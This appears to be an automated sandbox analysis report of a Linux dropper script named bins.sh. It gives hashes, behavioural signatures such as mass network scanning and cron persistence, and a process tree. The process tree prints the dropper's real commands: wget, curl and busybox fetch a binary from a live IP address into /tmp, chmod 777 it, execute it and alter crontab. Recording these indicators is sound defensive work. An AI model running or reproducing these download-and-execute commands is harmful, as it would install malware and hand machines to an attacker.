Analysis
max time kernel: 149s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240508-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 10-11-2024 01:22
Static task: static1
Behavioral task: behavioral1 (Sample: bins.sh, Resource: ubuntu1804-amd64-20240508-en)
Behavioral task: behavioral2 (Sample: bins.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: bins.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: bins.sh, Resource: debian9-mipsel-20240729-en)
General
Target: bins.sh
Size: 10KB
MD5: f0f4868aeaf3ef472470cdf9c3196646
SHA1: 4accc751d722b39cdca1ff7a5f366ee910897677
SHA256: 6a7f9557ab00824cc2c3f3fe1db071a5efe8cc09bea4df9141d44938ecde8df9
SHA512: b9d9868fde0a47ba003643f56140c2d15341dc4f2472dd4da8e7c17fc4ac1404c7e1e30089741902a3c3b15fbfd716dae7aac15df4674541bce8b84e11b83332
SSDEEP: 192:Ew8MZhcRhpyNdSai3L7Y6aszfLv+ocLSai3LY6aszfzJw8MZhENhpg:Ew8MZhc6CBvhHw8MZhEK
Malware Config
Signatures
Contacts a large (2193) amount of remote hosts (1 TTP)
This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows (1 TTP)
This may indicate a network scan to discover remotely running services.

File and Directory Permissions Modification (1 TTP, 1 IoC)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid 1490, process chmod

Executes dropped EXE (1 IoC)
Processes:
ioc /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681, pid 1491, process wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681

Renames itself (1 IoC)
Processes:
pid 1492, process wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681

Creates/modifies Cron job (1 TTP, 1 IoC)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description "File opened for modification", ioc /var/spool/cron/crontabs/tmp.rKkEOF, process crontab

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to tmp directory (3 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
description "File opened for modification", ioc /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681, process wget
description "File opened for modification", ioc /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681, process curl
description "File opened for modification", ioc /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681, process busybox
Processes
/tmp/bins.sh (PID 1481): /tmp/bins.sh
  /bin/rm (PID 1482): /bin/rm bins.sh
  /usr/bin/wget (PID 1483): wget http://216.126.231.240/bins/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681
    signatures: Writes file to tmp directory
  /usr/bin/curl (PID 1488): curl -O http://216.126.231.240/bins/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681
    signatures: Writes file to tmp directory
  /bin/busybox (PID 1489): /bin/busybox wget http://216.126.231.240/bins/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681
    signatures: Writes file to tmp directory
  /bin/chmod (PID 1490): chmod 777 wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681
    signatures: File and Directory Permissions Modification
  /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 (PID 1491): ./wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681
    signatures: Executes dropped EXE; Renames itself; Reads runtime system information
    /bin/sh (PID 1493): sh -c "crontab -l"
      /usr/bin/crontab (PID 1494): crontab -l
    /bin/sh (PID 1495): sh -c "crontab -"
      /usr/bin/crontab (PID 1496): crontab -
        signatures: Creates/modifies Cron job
  /bin/rm (PID 1498): rm wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681
  /usr/bin/wget (PID 1501): wget http://216.126.231.240/bins/KvH3UoksRRYPVQBB5h446C1JLpGoKMsui6
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 99KB
MD5: 9438d9bc392bcf300a5583b6df5bc8f6
SHA1: 375a6ae34b516f6f3eeea8030c4084f585017efa
SHA256: 68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA512: 1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Filesize: 210B
MD5: b8e2c71697b4674a560431b7dc0d297a
SHA1: a8f39b9c051e60bc8e61bd77f5f7ee7d399666f3
SHA256: 0dd021a602b885e1ae9428737fddf12557d158b852233cd05a9df4d34e06dee9
SHA512: 51318746d51828297a3fa8ff320393ff8b6fedfa669c08a7f61e88c649d8a87d34acd029e968ecb4a7fdb9444c8d7eec1f7c81534972b0f09d0a29e1c45da25c